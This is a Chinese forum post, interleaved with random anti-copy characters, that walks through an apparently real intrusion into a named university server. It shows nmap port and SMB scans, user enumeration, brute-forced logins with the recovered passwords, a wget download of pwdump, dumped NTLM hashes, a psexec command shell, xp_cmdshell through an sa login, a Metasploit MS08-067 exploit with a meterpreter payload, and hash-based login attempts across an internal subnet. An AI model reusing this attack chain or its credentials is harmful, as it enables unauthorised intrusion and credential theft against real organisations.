广西师范网站http://202.103.242.241/. }+ {. u, r5 e! v) v
2 |7 ] y+ x( Jroot@bt:~# nmap -sS -sV 202.103.242.241
( s, }8 o- e! [* u8 }* T; M4 i& Q
2 n# Q- ^7 W: {+ FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST4 I l: J9 o, a/ F
3 Z S1 s) r0 CNmap scan report for bogon (202.103.242.241)
; u) K2 P" W9 D9 N
r+ E/ P# W+ F4 F* j* A8 wHost is up (0.00048s latency).
8 H9 Y/ i: f9 K/ [, q; t- V7 `5 ~0 s l W
Not shown: 993 closed ports
' B- T+ x, u2 q; V. P1 T
+ B/ E/ q: }' b+ O& Q$ H5 }PORT STATE SERVICE VERSION
6 U* a% {! V+ p1 I' c( w! d, |0 p' g% f6 Y1 r7 C0 @) T, |7 L
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
& n& ^' e# a1 i% _ f( m( t0 Y1 e7 G% z+ q
139/tcp open netbios-ssn; M) J8 |" y* G
1 }0 S ^" L% v4 }4 _* e9 p2 O
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
. d/ U) B7 L" [2 H- x4 P2 t, ~
$ D1 W" t& r0 k) W7 N: K1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe). S1 L8 h! I( U, v) u' n4 R7 x
" [6 J6 x I. y7 H, x4 w; d! ]1026/tcp open msrpc Microsoft Windows RPC3 J( c) {3 n7 |3 i
; J; ^, g. i* w) a+ u: W3372/tcp open msdtc?
" P a1 j0 J& d2 @. @4 p( M) g( `' J* ]( X& Y3 h! T
3389/tcp open ms-term-serv?- t5 R; c# s* m a2 k+ f2 I
L/ k) e0 r/ h1 m* r1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
/ Z/ V6 q5 ^9 _SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r. e- a4 m; d' ]' J0 F
" f; |8 {/ z$ y
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions# P, y/ F4 _6 q9 Y
/ g0 D5 Z6 H+ d* ~$ S' q5 u
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)! a) ^) |. ?* G* S, [' P% q3 N2 @# W
3 A, u# C" h1 f0 j/ n& c1 H' W- ]SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO6 ]6 B p% b% O @( Z" J5 ?
, J2 V3 v. m+ G: S5 ?) w
SF:ptions,6,”hO\n\x000Z”);3 t- e" u6 P' G; h
2 @, E* J/ o `4 | l) L/ s
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems); V7 G: U% I' p) w: {7 P
* H0 R# w' Y' }" p0 C) wService Info: OS: Windows* W% N; y' o5 ]2 ?' @. R Q
& T4 h; _) P; q! W1 @: K
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
% R1 l6 P- g5 ?* e, I( |* Y, l+ B! ]2 Q7 [) p# F, b
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds1 C! k/ d. p, U4 B" I, H
# E Z' u2 q% c) @1 Z$ p4 [" Qroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本6 b: g% g2 c- i
, |) F$ E* j3 ~* G: F+ N) e
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse$ B0 _% W5 |" V3 J- A; E4 u
; [* }7 w* j5 l0 R; p! Q-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
8 Y* R* k! S* n& Y% x/ H# t$ @1 e V" O; L; D
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse6 E, x& k$ x" B: h. p8 Z
8 W6 G/ `7 e: z6 T* i+ Y
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse1 b$ x& s7 O% F7 y! _0 h
/ B% ]$ u$ D# r; m4 E1 t# N-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
+ T7 D* l) w* L) U' j# U2 Z5 {$ K9 w
" p2 T! `. r' ^2 Z6 u-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse% u* H( {* a+ z. |
' ^1 e6 [, k) F# _+ E [8 m6 Z
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
, I8 |' E2 x0 K9 _2 u) K9 Q3 @5 |
8 K; T9 y, k9 w/ w' R-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse6 O" `: U- C' t+ [# w
& M% b1 E1 h7 Q1 k4 A-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
! S1 Z6 R; t {& J7 A9 R6 B) ~7 E
8 X* i2 a7 @- g# N-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
& b6 t0 w u+ P1 v! J' h+ I! f# M8 [# L0 k
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
0 {: U/ o2 U4 ^! a# o- Z! t2 O9 _' C! w6 O; X0 E7 I
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
& w m) S9 i8 D* ^; e* ?) d, D3 ^, i
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse i, m2 o0 ~, c+ {
! v4 f( O' K j2 q* B: }- L-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
5 a. l, p& d* I2 F# B. W- R# o+ k5 y7 K' h# }* [5 \
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
$ [0 k( S7 y4 ?! U/ S# S X8 ?2 ^
0 A& Q! ]" l( ~7 `+ R* N3 croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 " R' n# j8 {/ V5 x
8 X R3 u/ K* z6 e" ?5 Z
//此乃使用脚本扫描远程机器所存在的账户名/ \3 k5 R g: U, _+ \
. O! S6 T. J; t# z* |, }" G0 OStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST8 S% @/ a: i/ y- \
$ x+ Q0 s0 [$ {4 x3 N$ u8 [6 Z- L4 u& R
Nmap scan report for bogon (202.103.242.241)6 d/ W9 v* u" [6 j" Y5 A0 P5 ?
4 Z4 Q" U( \) m
Host is up (0.00038s latency).$ j1 Y. j0 ^! T; X9 A
8 H9 Z% [. j) ZNot shown: 993 closed ports
3 {* h. [% q: U4 [* s7 N! e( d1 A( W# i
PORT STATE SERVICE& W( ]1 S( e& q' U
' Y& W& _. M5 q- l- R
135/tcp open msrpc% }1 Z8 H5 \7 h2 ^+ M
$ A6 Y6 Z, _6 {2 ]" ^1 P
139/tcp open netbios-ssn
+ F" A3 k5 X1 N4 R# C \+ M
: v" P Q/ D! c445/tcp open microsoft-ds, C. ~, l! X% H! {2 w0 E8 [: A
- M* b& g1 P6 z7 e+ G1 _- g% o1025/tcp open NFS-or-IIS
9 ?' b. C8 e! X u
, Y% p8 h' X# H! X N1026/tcp open LSA-or-nterm( I1 d4 V$ D2 ~. x, R0 g' g
' P9 l$ b+ l6 e+ e/ o/ R
3372/tcp open msdtc8 v9 k' R1 N/ u7 _' [ b
' {& }- Z) }8 ?* K( s$ E( `) u" o9 j3389/tcp open ms-term-serv
% r* R. A( Z$ y9 l% W* h
5 V7 _) w6 i& e" QMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 W5 f( D0 {& w$ m D
7 Y9 p$ d5 n, {6 E mHost script results:3 v( N' W- E: J: e o
+ Y4 [" U) |& L1 T: h
| smb-enum-users:
# p6 A, v, i1 K' C* W
( J$ B6 `2 s }0 Y+ k, N5 W4 ||_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
, k7 s8 |% `# `+ F2 y- ]! G; ~& w" S. Q7 [5 F
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds7 H7 }) Y9 Y3 _/ x4 p1 g" X2 J2 C
7 _4 @/ [. U: G7 D( Q4 c Proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
0 A4 Z) h. m: ~. |2 C
2 @5 ?0 q2 ]4 ^, S7 y! V//查看共享
F/ F, C& Y4 f. @
5 R, q/ {. Z) F( M: MStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST5 k/ A9 y( T( B0 q0 B0 A* T
- M# O' F& x O5 _$ Y6 BNmap scan report for bogon (202.103.242.241)# I4 d* i' Z! Q; q- ~
c u' b/ k" \/ g3 `4 n) ^; ~Host is up (0.00035s latency).
c! `+ R) v! |% x5 ^6 d9 r6 g
3 J0 H2 H- p8 Y: h# mNot shown: 993 closed ports
I2 M6 b# D9 T9 ]1 j9 r4 U" [% h. n6 B5 L+ A- p( E$ P
PORT STATE SERVICE
' `% Q6 F e* f' g3 D3 u: o$ }0 `# m! n% n \9 W
135/tcp open msrpc" a' X% \8 G3 M/ {+ V
4 V7 @( e/ M( J+ J( }139/tcp open netbios-ssn( H; j* d% F( F/ k/ z0 l2 F% r
4 s. x- j& o i9 c: M# ]# I445/tcp open microsoft-ds
7 t/ h7 F }3 o3 w
- g! m( U( o3 z3 t% r; A1025/tcp open NFS-or-IIS$ Y4 V- I8 {/ _: b7 m; m. F
6 B1 ~3 s1 p! C7 W1026/tcp open LSA-or-nterm: e8 E* d$ i; Z0 t: c" C4 Q7 g
! v1 o) r* @2 X4 B
3372/tcp open msdtc
/ R3 R. f9 w v
6 C) X$ r+ ]8 T2 q+ n# y7 E0 W7 L/ `1 {' T/ G3389/tcp open ms-term-serv
% R8 l4 ^+ c8 I/ b6 t
u6 ~/ a; u3 x7 D7 ~8 ~9 X% A/ IMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! m! C+ W3 ~8 w
3 W2 ?5 E; {5 S4 v, S, @) aHost script results:
9 ]3 L- o( ^& W4 n
1 d& o, e7 C( G" O| smb-enum-shares:: |. k3 ~% C- m/ K7 C
i9 g2 ~, `. ?| ADMIN$0 N8 K. K; b! }0 Y/ ? j; L
; S1 V* U* k2 R+ d
| Anonymous access: <none>
3 n" d7 m0 p j9 T; \2 B* b- ]; N' u$ ]( w
| C$/ R1 U2 x* K+ d! r/ `
) ]9 B$ T) _* f: R1 \$ }
| Anonymous access: <none>1 [4 L) Q, F! _" \9 y
% ?( Q6 t3 f& _- C8 C* Y| IPC$
" X! F8 l% J% q5 x3 s: x- A3 z( ]/ ], |4 A' n
|_ Anonymous access: READ4 h/ D& X) T/ Z" o0 @+ N
/ C9 T. R+ n+ tNmap done: 1 IP address (1 host up) scanned in 1.05 seconds3 C( ^- V$ K0 k& X( n7 ]: |6 ~
, h. e& U$ Q, i+ z k# M$ [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
3 f& }8 |4 I$ M. o3 I5 a$ P. c8 F- q' f4 i
//获取用户密码
3 b0 h2 ]& X9 X; a! `8 q, ]3 \, k8 y$ o- `3 H, A+ m J* |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
- v+ ^" t. q) g5 y/ Q `/ R9 n7 o; k J3 W( E" k+ ?; W
Nmap scan report for bogon (202.103.242.2418)
, {- Y) d p2 ?% N1 z3 V- Z; a2 O! q4 h
3 s1 T: d9 R: B8 tHost is up (0.00041s latency)./ c5 c o2 o% l2 u' J
& y+ L" ?# O' i' }
Not shown: 993 closed ports2 }9 W# _1 S7 I- g3 U& m' O
$ c9 D' \5 Z" R. p1 E1 @! `PORT STATE SERVICE7 ~# x: O @6 q4 x
6 Y+ N ?: v: C3 Y: c7 c135/tcp open msrpc T4 ^- R) f/ A1 z; Q
3 ^# l2 b. B1 w. g. P `2 `
139/tcp open netbios-ssn
2 A: w9 K; F" B# S
# Y, s9 S7 M8 q) K445/tcp open microsoft-ds& }! d3 w9 i' W: J; V( q# H1 e
7 c, \% [' a) J$ F) Y& w1025/tcp open NFS-or-IIS- W) o* x2 B) U, R: N; V, V) }4 K
4 l7 b, y" D! V& u) A0 A% g: Y+ j1026/tcp open LSA-or-nterm8 a6 C8 Z' Q# p& C B; p
. \' `7 N$ N0 q. |' m5 g/ a% t3372/tcp open msdtc
. S7 z g' i6 R+ C% Y' ?5 z. L" ~( i" _ g1 W- J8 k" a
3389/tcp open ms-term-serv; D+ @0 `5 {, n5 Y( w/ |, [# y
" j- U* F0 |3 m) J, B: {
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); p" V) g5 T n
6 f, C- j- \1 ?7 E r9 r
Host script results:: M8 r) k5 Q. K. k' t0 t9 ]
8 W9 W8 p7 Y! y- U! Y8 D. b, P
| smb-brute:! p4 e3 R; O" W/ ~
- J9 R' P9 c5 V+ ~administrator:<blank> => Login was successful$ a& F3 f% z( R8 ^. d, y
* C! Y Z' \& W/ n9 @! d9 |- E: s|_ test:123456 => Login was successful
+ \5 @. l" Z4 L/ e5 M' U: H4 u4 S$ K8 J: l
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
) v# |/ i# R/ X& `! P" N. `7 d
! ?$ g' C3 Y) Z$ Q5 M/ e& s1 Mroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash" o7 G5 N' {* I/ t7 e/ b3 l% C
+ @0 g! d, @/ E- Y) f6 m
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data* U1 i+ V c! a* p N8 ]* }' @
+ g) z7 C/ z1 h4 T, hroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse0 |2 o/ A6 i0 Z( h0 S
8 e/ Z6 I3 m0 E) _2 T P
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139& }9 Z$ T y! }3 u# ]$ k# m |
" b4 h% |/ \7 t6 P9 W, c: l" _0 GStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST& S% J4 a K/ M/ m/ o
6 q; [+ w& v l, y8 T
Nmap scan report for bogon (202.103.242.241)7 N j& W$ j/ f+ `& p, Y$ g
- C- Q: F) i$ J3 d. ]
Host is up (0.0012s latency).
$ E/ U; y$ n7 u9 Y& K! Y6 @
' k8 v$ F* D( r. `6 C/ tPORT STATE SERVICE7 j4 M( {7 S# k$ C0 s0 P
' D# e, q. K/ h8 n
135/tcp open msrpc
& e( k) T) o/ P, a$ k- P8 t& D
$ W4 ^/ t5 A+ c139/tcp open netbios-ssn, U* j0 T3 X) U2 G! r& v
8 M( U0 ]) G3 {7 ] }- i! i
445/tcp open microsoft-ds$ s/ m# u& Z- C3 j1 r, g
}# g6 w- a% m! u5 r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 C8 e* M1 R! `% T( q0 Q
$ [* M: h* y( p4 r9 K
Host script results:
! p% t# e; ~7 q3 T
- B$ f; \6 }# S- A# n" z| smb-pwdump:) s. A- d( K: z9 B7 {
@1 w1 J7 ]) M# w6 _# z6 ~& {: v
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************1 m6 d& O( b# M
& z4 h# J- t! N' c; \- v6 D0 h3 Y
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************7 V* J) d0 U/ b; m7 T/ b
/ f% f8 s8 g# N2 e: S
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0 C" Y. L: Z! G# W5 e# Z1 x; i5 G1 d. z9 \4 ?5 C
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
2 ]3 [* N) s+ [/ d) |
! R* h0 L" @# R3 E3 HNmap done: 1 IP address (1 host up) scanned in 1.85 seconds" @6 j! I9 ~$ S1 a
$ x9 w8 \0 O5 M. e Q# p
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell5 y; ~2 D7 l/ o. O& m- l. L" l, ^7 ?
- [9 a9 R# V* T, o+ T-p 123456 -e cmd.exe
! D5 B4 ~& V' v% L! f/ L4 F' Z; M2 L* F A9 z) ]- l( r9 E2 g k3 }
PsExec v1.55 – Execute processes remotely
1 d: B# E. x. m/ P5 x: ~ t
# s2 d) e, @, N% WCopyright (C) 2001-2004 Mark Russinovich) @" h7 z% F R2 T4 |1 A9 x1 [
|+ `" x' m6 U: Z% }
Sysinternals – www.sysinternals.com" m2 G; R _, T+ l9 B7 O
) o. c# Y1 V _( E
Microsoft Windows 2000 [Version 5.00.2195]
E! g. X. g: D, a; h: a/ O3 Y( l9 z# N `5 O5 t2 g6 `" ?
(C) 版权所有 1985-2000 Microsoft Corp.' X5 c% G# f1 \( m1 s
" P% G8 T! i7 z0 n2 RC:\WINNT\system32>ipconfig
$ G8 C0 i, A1 g( b, ]4 {
! B2 w/ C9 W/ G' Y4 |5 NWindows 2000 IP Configuration
" b; V7 @* ?# z! d9 H
) ]( p$ h: |6 a" r% i. uEthernet adapter 本地连接:
! x! W. t6 N- B0 u6 W: L
9 l: K+ {+ h4 f5 V7 PConnection-specific DNS Suffix . :
) u0 x6 K3 q' u
- _" q4 U- I% M9 z; p, S9 e. ^- wIP Address. . . . . . . . . . . . : 202.103.242.2416 c$ }( ?+ P' q8 X" ]
6 \- |+ J- m" e7 I4 q6 qSubnet Mask . . . . . . . . . . . : 255.255.255.0- _; Z: J0 w* g3 m4 ~
% K1 d% S* P1 v" iDefault Gateway . . . . . . . . . : 202.103.1.1
' [! d& I4 e( e7 B/ W, v5 U: w. i7 m3 x
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
/ K+ K2 ]- l! U4 S
/ m2 C/ B- M# Z7 f) U5 d: D) Broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
" S5 }3 J. J7 v5 d. m& F# w6 F) g- e/ i" e5 j; [1 o1 k. D
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
" h* s6 C2 M8 x
5 d: r; ~5 g( vNmap scan report for bogon (202.103.242.241)
8 g# D) V0 U2 Y+ g, t6 |+ g
3 x1 Y c+ T9 p0 EHost is up (0.00046s latency).
3 W. M( N+ c6 \& _4 M; e; ` H. u' }1 s4 |5 x
Not shown: 993 closed ports
, q, e, @+ f. \/ n5 d* R
+ S) m: G2 i& MPORT STATE SERVICE- U T5 b& Z1 }* L0 f+ r* f
7 \8 Z# }" b* e5 A6 Y135/tcp open msrpc
0 c) T1 K4 I' b6 W! [5 c3 _
z ~- l. z3 @2 b: p, w139/tcp open netbios-ssn& Q! U! c- ^; f' d& H, e
4 P% a2 j! Q! V# u3 j D- W
445/tcp open microsoft-ds+ p' y0 i/ a" \
9 z4 M, G0 a K) G0 P( o
1025/tcp open NFS-or-IIS0 I$ K0 J, j( W2 M6 y1 b9 W
- [4 Q! Z6 \" m2 K
1026/tcp open LSA-or-nterm8 X, _! J/ @, Q
Z3 Y& u0 I" N, \+ ]+ N5 a6 q
3372/tcp open msdtc
' r8 B+ G6 K& k4 I5 q4 a5 ~
! w5 Y* \ \( D2 |3389/tcp open ms-term-serv
7 V+ c; K' k3 G: T5 d' I8 {# s: N+ y4 R+ G8 ^) L
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 W% |4 K4 r: w& n q8 ]1 E; Q
3 c* X$ | G# gHost script results:
) ^0 Z, f2 o! ~1 C& a
+ ]0 G( p1 V* x) j| smb-check-vulns:1 B$ F# f1 v4 v8 r& b& m) w. C
2 W, X5 X7 N7 u( ~|_ MS08-067: VULNERABLE! {6 c# ?7 E u" `2 S: ^
6 d: }4 W( @4 j* c
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds0 y# j4 @* p: t& C
1 S) ^2 ~8 \2 w% `1 h, P6 U0 @root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出2 n( e: q8 b9 T3 |: i
7 P3 m* y( A; O, h$ @- D7 Bmsf > search ms08
$ g5 M7 V1 t. K0 m$ M( [4 Z8 G$ E, |3 l+ C* s0 @; U5 ~: v
msf > use exploit/windows/smb/ms08_067_netapi5 P* e* Q) j. c, x5 c+ x- j: N
; ]' U7 T/ a, g
msf exploit(ms08_067_netapi) > show options) f1 D, I, |( J- U2 n, v
" C* R7 g& @0 t, n" umsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
4 m' `8 q) e' b- m, O7 {# u& V8 e% S/ `5 D# S4 b8 S7 F. c
msf exploit(ms08_067_netapi) > show payloads
0 ~2 v! b" p0 z c6 A+ x: _5 o, |% r, H& i" ^* j
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp- N" R( Z0 P6 G# m& g! e) B
" f: z9 c, p+ p; i9 a J) Y
msf exploit(ms08_067_netapi) > exploit
7 I- g7 l1 ~+ D: K2 J
; }1 j" P: ~ R2 j% s' F1 smeterpreter >% R3 w5 F( p* [8 t9 c
" J3 a& `3 ^: c- i" a! p
Background session 2? [y/N] (ctrl+z)- ~- v+ {4 R9 E/ F( m& f |$ q
! W+ L' c. x x e6 h( U
msf exploit(ms08_067_netapi) > sessions -l+ J( M0 a! J; D% [/ b% z7 ?
, K' Y# O0 m4 O, m3 X$ droot@bt:/usr/local/share/nmap/scripts# vim usernames.txt; x( E6 O8 i. k1 o' k) n
& h: p1 H. V6 O5 x `( \9 D4 Y) x6 P
test
3 ?- P4 P$ T. {+ e+ B$ |/ Y7 Y y' h; U/ H1 C. ]% ^* O4 q
administrator
& g$ h' m0 h' F* b# b" Q; L0 c: z4 l; |+ m5 I0 q) }, s- q" f
root@bt:/usr/local/share/nmap/scripts# vim password.txt0 f( u0 i5 @8 ?9 O8 X
/ F, V0 o% G+ M- I6 d1 w# i44EFCE164AB921CAAAD3B435B51404EE5 t( O% ]6 m# p, @7 B% m% B
9 E5 F' S7 v2 M* ~5 D0 iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 3 z, Z) T% n$ c! _" }. d
& e3 w( N. C, G) W1 r0 | //利用用户名跟获取的hash尝试对整段内网进行登录
/ i8 C( T0 M" q( o8 ?3 b- O, j0 S& F6 k8 M
Nmap scan report for 192.168.1.105
2 l/ t$ D+ ^% B2 n6 _7 B- V/ N+ o
+ z. E7 h% s$ x$ FHost is up (0.00088s latency).
- q9 S, n2 f/ L* `( e2 P9 l7 [ d. q; n$ G1 W c; S
Not shown: 993 closed ports8 y2 A; _ l. R; u7 t
- Y2 V8 T& C; u# @, v- WPORT STATE SERVICE( G, u0 G T' P, H$ h
0 I1 O/ D+ l9 e
135/tcp open msrpc
1 a/ K9 E* \$ L* ]( F) _& s
% W, {5 a5 h/ A" D139/tcp open netbios-ssn+ M4 \2 C! e3 J1 p3 K R2 {0 v
! j! a4 q+ ]. ?445/tcp open microsoft-ds' A# }! ^) H, j! w* f$ J
7 W9 ?' B! A' C( _/ v6 u
1025/tcp open NFS-or-IIS
y1 ~' E4 o; ?1 ^" O- ~5 G9 K% C" R1 W1 M1 A) k
1026/tcp open LSA-or-nterm
& B. Y. N- t" O D: n5 \$ _ q" s3 `$ {& d( ]# {
3372/tcp open msdtc4 b d2 W0 B3 w: W1 r( C3 U
8 ]; z8 ~1 P* l3 B& C3389/tcp open ms-term-serv/ j& M4 W! @: J8 f L
1 t. J* H& } g& r* l# `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* D$ I& }; x0 K6 ~
" o( L! X; J1 w) M8 N& MHost script results:8 l1 l* b8 l7 m
* }9 A& \& G: {' L! U1 f
| smb-brute:1 Q P% [( Z6 C/ t1 F
& y9 @7 v: d2 Y; y5 P|_ administrator:<blank> => Login was successful# _ X( s! ^" O, l$ c5 {
! y) h! {: t' f- f* y/ Y
攻击成功,一个简单的msf+nmap攻击~~·1 Q9 l. b9 x0 ~. U+ a8 C
/ u# ]9 t$ } k8 ~ |
发表于 2012-12-4 12:46:42
收藏
支持
反对